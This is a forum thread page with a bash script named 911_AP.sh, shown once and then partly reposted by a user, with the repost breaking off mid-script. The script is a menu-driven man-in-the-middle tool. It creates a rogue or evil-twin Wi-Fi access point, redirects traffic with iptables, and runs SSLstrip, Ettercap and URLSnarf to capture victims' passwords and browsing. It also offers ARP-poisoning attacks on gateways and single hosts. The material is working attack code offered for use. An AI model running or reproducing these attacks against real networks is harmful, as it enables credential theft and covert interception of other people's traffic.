echo $RED"                   *    6.  Install Dhcp3-server        *";
echo $RED"                   *    7.  Update aircrack-ng          *";
echo $RED"                   *    8.  Return to Main Menu         *";
echo $RED"                   **************************************";

echo $BLUE"                           Select Menu Option:"$STAND
read menuoption
if [ $menuoption = "1" ]; then

#This command will look for any upgrades to your OS distro.
sudo apt-get update
clear
./911_AP.sh
else

#This command will look for any upgrades to your OS distro.
if [ $menuoption = "2" ]; then
sudo apt-get upgrade
clear
./911_AP.sh
else

#This command will look for any distribution upgrades to your OS distro.
if [ $menuoption = "3" ]; then
sudo apt-get dist-upgrade
clear
./911_AP.sh
else

#This command edit etter.conf
if [ $menuoption = "4" ]; then
nano /etc/etter.conf
clear
./911_AP.sh
else

#This command will edit your tunnel interface
if [ $menuoption = "5" ]; then
nano /etc/default/isc-dhcp-server
clear
./911_AP.sh
else

#This command will Install DHCP3-server on BT5r3
if [ $menuoption = "6" ]; then
apt-get install dhcp3-server
clear
./911_AP.sh
else

#This command will update aircrack-ng to the latest nightly build
if [ $menuoption = "7" ]; then
sudo airodump-ng-oui-update
clear
else
if [ $menuoption = "8" ]; then
./911_AP.sh
fi
fi
fi
fi
fi
fi
fi
fi
else

if [ $menuoption = "2" ]; then
#This command will RUN The STATIC FAKE AP attack
sleep 2

# Configuring your Network interfaces
echo
echo $BLUE"                   [+] Lets get started shall we [+]"
echo $STAND""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
#creates session directory
mkdir -p /root/$SESSION
clear

echo $BLUE"              Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"             Configuring and Starting your FAKE Access Point...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo $BLUE"                     Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo $BLUE"              Setting up DHCP to work with $ESSID...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
echo $BLUE"            Starting SSLstrip to enumerate user credentials...."
sudo xterm  -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
echo $BLUE"               Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo $BLUE"          Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"    ####################################################################"
echo $RED"    [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"    [                                                                  ]"
echo $RED"    [     Press Y then ENTERKEY to close kill and clean up the script  ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
echo ""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"$STAND
echo ''
sleep 2

kill ${fakeapid}
kill ${dhcpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up    [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency         [+][+][+]"
sleep 5
exit

fi

sleep 3
clear

./911_AP.sh
else

# This command will RUN The EVIL TWIN AP attack
if [ $menuoption = "3" ]; then
sleep 3

# Configuring your Network interfaces
echo
echo $BLUE"                       [+] Lets get started shall we [+]"$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
clear
mkdir -p /root/$SESSION
clear

echo $BLUE"               Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"                     Configuring and Starting $ESSID...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo "                          Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo "                   Setting up DHCP to work with EVIL TWIN AP...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
echo "               Starting SSLstrip to enumerate user credentials...."
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
echo "                 Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo "            Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

#SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"     ####################################################################"
echo $RED"     [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"     [                                                                  ]"
echo $RED"     [    Press Y then ENTERKEY to close kill and clean up the script   ]"
echo $RED"     [                                                                  ]"
echo $RED"     [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"     ####################################################################"
echo $STAND""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"
echo ''
sleep 2

kill ${fakeapid}
kill ${dhcpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up    [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency         [+][+][+]"$STAND
sleep 5

fi

sleep 3
clear
./911_AP.sh
else

# Credits to N1t0g3n for the base to this section. Thanks bro
if [ $menuoption = "4" ]; then
clear
echo ""
echo ""
echo $BLUE"                  Finding wireless and ethernet interfaces."$STAND
sleep 3
echo ""
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
echo ""
echo ""
echo "Please type the name of your wireless interface (wlan0): "
read WIFACE
sleep 2
echo ""
echo ""
echo "Please type the name of your ethernet interface (eth0): "
read ETH0
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION

mkdir -p /root/$SESSION
clear
echo ""
echo ""
clear
echo $RED"              **************************************************";
echo $RED"              *    1.  Attack entire Gateway through LAN       *";
echo $RED"              *    2.  Attack entire Gateway through Wireless  *";
echo $RED"              *    3.  Attack single host through LAN          *";
echo $RED"              *    4.  Attack single host through Wireless     *";
echo $RED"              *    5.  Return to Main Menu                     *";
echo $RED"              **************************************************";
echo $STAND""
echo ""
echo $BLUE"                           Select Menu Option: "
read menuoption
if [ $menuoption = "1" ]; then
echo
echo
echo "                This should be your Gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your Gateway in below: "$STAND
read GATEWAY
echo $BLUE"                         Starting attack on Gateway"
echo ""
echo ""
echo "                   Passwords will show up in ettercap window"
sleep 3
echo "1" > /proc/sys/net/ipv4/ip_forward

#  PORT redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf  -i $ETH0 &
sleep 2

# Ettercap
xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "2" ]; then
#This will allow you to forward packets from the router
echo $BLUE"              This should be your gateway from what I see: "$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $BLUE"Please type the IP of your gateway: "$STAND
read GATEWAY
echo $BLUE"                      Starting attack on gateway"
echo ""
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Etterap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "3" ]; then
#This will allow you to forward packets from the router
echo ""
echo ""
echo $BLUE"              This should be your gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY3
echo ""
echo ""
echo "Please type the IP of the target host: "
read HOST3
echo ""
echo $BLUE"                      Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "4" ]; then
echo ""
echo ""
echo $BLUE"This should be your Gateway from what I see: "
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY4
echo ""
echo "Please type the IP of the target host: "
read HOST4
echo ""
echo $BLUE"                     Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log  -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
clear

echo $RED"                Invalid option, you must choose 1,2,3,4 or 5.."
sleep 2
echo $BLUE"                          Re-Launching Script..."
./911_AP.sh

fi
fi
fi
fi
if [ $menuoption = "5" ]; then
./911_AP.sh
fi
else

# A script to quickly tell whose on your network in real time.
if [ $menuoption = "5" ]; then
clear
echo $BLUE"           This will show all The clients connected to The network"
echo ""
sleep 3
clear
echo
echo
echo $STAND"Please type the name of your network interface Example: eth0 "
read IFACE;
echo ""
echo ""
echo "               This should be your gateway from what I see: "
route -n -A inet | grep UG
sleep 1
echo ""
echo ""
echo $STAND"Please type in the IP address of your gateway"
read GATEWAY;
sleep 2
clear
echo ""
echo ""
echo ""
echo $BLUE"                   Press CTRL C to stop close netdiscover"
echo ""
echo ""
echo $RED"    ####################################################################"
echo $RED"    [           em3rgency's Netdiscover script is now running          ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"

sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24
read ENTERKEY
clear
./911_AP.sh

else
if [ $menuoption = "6" ]; then
exit
fi
fi
fi
fi
fi
fi
"He who passes not his days in the realm of dreams is the slave of the days."

ch3rn0byl

  • Guest
Re: em3rgency 911_AP Script
« Reply #14 on: June 02, 2015, 05:20:30 PM »
https://github.com/crypiehef/911_AP.sh



You wanna know how I found it?

I pasted the link that was no longer available into the google search bar.

Then I accessed the cached link. The cached link had the git-hub address.

Heres another cool trick: I am going to paste the code here too, you know, just in case it goes missing from git-hub  8)

Code: [Select]
#!/bin/bash
# updated mar 4th 2015
# script coded by em3rgency
# script updated by crypiehef to work with Kali Linux
# 911_AP version 1.1 (kali)
# xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
# This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
# Also includes workin ARP poisoning features.
# Tested and working on kali Linux, Needs to have version 1.3 of dhcp3-server to work correctly
# Works with ISC DHCP Server now. Readme needs to be updated with ISC config instructions.

#DEFINED COLOR SETTINGS
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)

echo ""
echo ""
echo ""
echo $RED"              +############################################+"
echo $RED"              +    em3rgency's Fake AP SSL MITM script     +"
echo $RED"              +                                            +"
echo $RED"              +                Version 1.1                 +"
echo $RED"              +                                            +"
echo $RED"              +           www.em3rgency.com                +"
echo $RED"              +############################################+"
echo ""
echo $BLUE"     Visit http://www.em3rgency.com for updates to this script. Thanks"
echo ""
echo ""
sleep 3
clear

echo $BLUE"                    em3rgency's MITM script Version 1.1 !"
echo
echo $RED"              ************************************************";
echo $RED"              *    1.  Prerequsites and Updates              *";
echo $RED"              *    2.  Run FAKE AP Static                    *";
echo $RED"              *    3.  Run EVIL TWIN AP                      *";
echo $RED"              *    4.  Run Standard ARP poison               *";
echo $RED"              *    5.  Netdiscover connected clients         *";
echo $RED"              *    6.  EXIT                                  *";
echo $RED"              ************************************************";
echo ""

echo $BLUE"                          Select Menu Option:"
read menuoption
if [ $menuoption = "1" ]; then
clear
echo ""
echo $RED"                   **************************************";
echo $RED"                   *    1.  Run apt-get update          *";
echo $RED"                   *    2.  Run apt-get upgrade         *";
echo $RED"                   *    3.  Distribution upgrade        *";
echo $RED"                   *    4.  Edit etter.conf             *";
echo $RED"                   *    5.  Edit DHCP tunnel interface  *";
echo $RED"                   *    6.  Install Dhcp3-server        *";
echo $RED"                   *    7.  Update aircrack-ng          *";
echo $RED"                   *    8.  Return to Main Menu         *";
echo $RED"                   **************************************";

echo $BLUE"                           Select Menu Option:"$STAND
read menuoption
if [ $menuoption = "1" ]; then

#This command will look for any upgrades to your OS distro.
sudo apt-get update
clear
./911_AP.sh
else

#This command will look for any upgrades to your OS distro.
if [ $menuoption = "2" ]; then
sudo apt-get upgrade
clear
./911_AP.sh
else

#This command will look for any distribution upgrades to your OS distro.
if [ $menuoption = "3" ]; then
sudo apt-get dist-upgrade
clear
./911_AP.sh
else

#This command edit etter.conf
if [ $menuoption = "4" ]; then
nano /etc/etter.conf
clear
./911_AP.sh
else

#This command will edit your tunnel interface
if [ $menuoption = "5" ]; then
nano /etc/default/isc-dhcp-server
clear
./911_AP.sh
else

#This command will Install DHCP3-server on BT5r3
if [ $menuoption = "6" ]; then
apt-get install dhcp3-server
clear
./911_AP.sh
else

#This command will update aircrack-ng to the latest nightly build
if [ $menuoption = "7" ]; then
sudo airodump-ng-oui-update
clear
else
if [ $menuoption = "8" ]; then
./911_AP.sh
fi
fi
fi
fi
fi
fi
fi
fi
else

if [ $menuoption = "2" ]; then
#This command will RUN The STATIC FAKE AP attack
sleep 2

# Configuring your Network interfaces
echo
echo $BLUE"                   [+] Lets get started shall we [+]"
echo $STAND""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
#creates session directory
mkdir -p /root/$SESSION
clear

echo $BLUE"              Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"             Configuring and Starting your FAKE Access Point...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo $BLUE"                     Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo $BLUE"              Setting up DHCP to work with $ESSID...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
echo $BLUE"            Starting SSLstrip to enumerate user credentials...."
sudo xterm  -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
echo $BLUE"               Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo $BLUE"          Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"    ####################################################################"
echo $RED"    [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"    [                                                                  ]"
echo $RED"    [     Press Y then ENTERKEY to close kill and clean up the script  ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
echo ""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"$STAND
echo ''
sleep 2

kill ${fakeapid}
kill ${dhcpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up    [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency         [+][+][+]"
sleep 5
exit

fi

sleep 3
clear

./911_AP.sh
else

# This command will RUN The EVIL TWIN AP attack
if [ $menuoption = "3" ]; then
sleep 3

# Configuring your Network interfaces
echo
echo $BLUE"                       [+] Lets get started shall we [+]"$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
